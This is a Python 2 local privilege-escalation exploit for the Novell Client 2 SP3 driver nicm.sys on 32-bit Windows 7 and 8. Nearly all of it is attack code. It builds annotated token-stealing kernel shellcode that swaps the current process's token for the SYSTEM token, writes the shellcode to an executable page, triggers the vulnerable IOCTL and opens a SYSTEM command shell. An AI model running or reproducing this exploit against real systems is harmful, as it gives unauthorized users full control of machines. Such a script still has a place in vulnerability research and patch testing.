# Novell Client 2 SP3 Privilege escalation exploit
# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0
# Thanks to Master Ryujin :)
# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure whether there was anything else public)
# Exploit for DEMO purposes :)
# Does not bypass SMEP on Windows 8
# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/
#
# Python 2 script (print statements; str is used as the raw byte buffer handed to ctypes).

from ctypes import *
import sys, struct, os
from optparse import OptionParser

kernel32 = windll.kernel32
ntdll = windll.ntdll

if __name__ == '__main__':
    usage = "%prog -o <target>"
    parser = OptionParser(usage=usage)
    parser.add_option("-o", type="string", action="store", dest="target_os",
                      help="Available target operating systems: WIN7, WIN8")
    (options, args) = parser.parse_args()
    OS = options.target_os
    if not OS or OS.upper() not in ['WIN7', 'WIN8']:
        parser.print_help()
        sys.exit()
    OS = OS.upper()

    # Token-stealing payload: starting from the current EPROCESS, walk the
    # ActiveProcessLinks list until UniqueProcessId == 4 (System) and copy that
    # process's Token pointer over the current process's Token. The structure
    # offsets differ between Windows 7 and Windows 8, hence the two variants.
    if OS == "WIN7":
        _KPROCESS = "\x50"   # KTHREAD -> KPROCESS/EPROCESS offset for Win7
        _TOKEN    = "\xf8"   # EPROCESS.Token offset for Win7
        _UPID     = "\xb4"   # EPROCESS.UniqueProcessId offset for Win7
        _APLINKS  = "\xb8"   # EPROCESS.ActiveProcessLinks offset for Win7
        steal_token = (
            "\x52" +                                              # push edx
            "\x53" +                                              # push ebx
            "\x33\xc0" +                                          # xor eax, eax
            "\x64\x8b\x80\x24\x01\x00\x00" +                      # mov eax, fs:[eax+0x124]   (current KTHREAD)
            "\x8b\x40" + _KPROCESS +                              # mov eax, [eax+_KPROCESS]  (current EPROCESS)
            "\x8b\xc8" +                                          # mov ecx, eax
            "\x8b\x98" + _TOKEN + "\x00\x00\x00" +                # mov ebx, [eax+_TOKEN]
            "\x89\x1d\x00\x09\x02\x00" +                          # mov [0x20900], ebx
            "\x8b\x80" + _APLINKS + "\x00\x00\x00" +              # mov eax, [eax+_APLINKS]   (Flink)
            "\x81\xe8" + _APLINKS + "\x00\x00\x00" +              # sub eax, _APLINKS         (next EPROCESS)
            "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" + # cmp dword [eax+_UPID], 4
            "\x75\xe8" +                                          # jne back to the Flink load
            "\x8b\x90" + _TOKEN + "\x00\x00\x00" +                # mov edx, [eax+_TOKEN]     (System token)
            "\x8b\xc1" +                                          # mov eax, ecx
            "\x89\x90" + _TOKEN + "\x00\x00\x00" +                # mov [eax+_TOKEN], edx
            "\x5b" +                                              # pop ebx
            "\x5a" +                                              # pop edx
            "\xc2\x08\x00"                                        # ret 8
        )
        sc = steal_token
    else:
        _KPROCESS = "\x80"   # KTHREAD -> KPROCESS/EPROCESS offset for Win8
        _TOKEN    = "\xEC"   # EPROCESS.Token offset for Win8
        _UPID     = "\xB4"   # EPROCESS.UniqueProcessId offset for Win8
        _APLINKS  = "\xB8"   # EPROCESS.ActiveProcessLinks offset for Win8
        steal_token = (
            "\x52" +                                              # push edx
            "\x53" +                                              # push ebx
            "\x33\xc0" +                                          # xor eax, eax
            "\x64\x8b\x80\x24\x01\x00\x00" +                      # mov eax, fs:[eax+0x124]   (current KTHREAD)
            "\x8b\x80" + _KPROCESS + "\x00\x00\x00" +             # mov eax, [eax+_KPROCESS]  (current EPROCESS)
            "\x8b\xc8" +                                          # mov ecx, eax
            "\x8b\x98" + _TOKEN + "\x00\x00\x00" +                # mov ebx, [eax+_TOKEN]
            "\x8b\x80" + _APLINKS + "\x00\x00\x00" +              # mov eax, [eax+_APLINKS]   (Flink)
            "\x81\xe8" + _APLINKS + "\x00\x00\x00" +              # sub eax, _APLINKS         (next EPROCESS)
            "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" + # cmp dword [eax+_UPID], 4
            "\x75\xe8" +                                          # jne back to the Flink load
            "\x8b\x90" + _TOKEN + "\x00\x00\x00" +                # mov edx, [eax+_TOKEN]     (System token)
            "\x8b\xc1" +                                          # mov eax, ecx
            "\x89\x90" + _TOKEN + "\x00\x00\x00" +                # mov [eax+_TOKEN], edx
            "\x5b" +                                              # pop ebx
            "\x5a" +                                              # pop edx
            "\xc2\x08\x00"                                        # ret 8
        )
        sc = steal_token

    # IOCTL input buffer, placed at 0x0d0d0000 in our own address space. It is a
    # chain of pointers back into the same page, with the payload at 0x0d0d0028.
    kernel_sc  = "\x14\x00\x0d\x0d"        # 0x0d0d0000 -> 0x0d0d0014
    kernel_sc += "\x41\x41\x41\x41" * 4    # filler
    kernel_sc += "\x18\x00\x0d\x0d"        # 0x0d0d0014 -> 0x0d0d0018
    kernel_sc += "\x41\x41\x41\x41" * 3    # filler
    kernel_sc += "\x28\x00\x0d\x0d"        # 0x0d0d0024 -> 0x0d0d0028
    kernel_sc += sc                        # payload at 0x0d0d0028

    print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."
    print "[>] Finding the driver."
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    INVALID_HANDLE_VALUE = -1
    DEVICE = '\\\\.\\nicm'
    device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ | GENERIC_WRITE, 0, None,
                                          OPEN_EXISTING, 0, None)

    EVIL_IOCTL = 0x00143B6B   # Vulnerable IOCTL
    retn = c_ulong()
    input_buffer = 0x0d0d0000   # raw user-mode address of the buffer, not a Python object
    input_size   = 0x14
    output_buffer = 0x0
    output_size   = 0x0

    baseadd = c_int(0x0d0d0000)
    MEMRES  = (0x1000 | 0x2000)   # MEM_COMMIT | MEM_RESERVE
    PAGEEXE = 0x00000040          # PAGE_EXECUTE_READWRITE
    Zero_Bits  = c_int(0)
    RegionSize = c_int(0x1000)
    write = c_int(0)

    print "[>] Allocating memory for our shellcode."
    dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize),
                                             MEMRES, PAGEEXE)

    print "[>] Writing the shellcode."
    # Write only the bytes we built; the rest of the fresh page is already zero.
    kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, len(kernel_sc), byref(write))

    # CreateFileA returns INVALID_HANDLE_VALUE (-1) on failure, which is truthy,
    # so compare explicitly instead of testing the handle for truth.
    if device_handler != INVALID_HANDLE_VALUE:
        print "[>] Sending IOCTL to the driver."
        dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, input_buffer, input_size,
                                          output_buffer, output_size, byref(retn), None)
        print "[>] Dropping to a SYSTEM shell."
        os.system("cmd.exe /K cd C:\\windows\\system32")
    else:
        print "[-] Could not open the nicm device."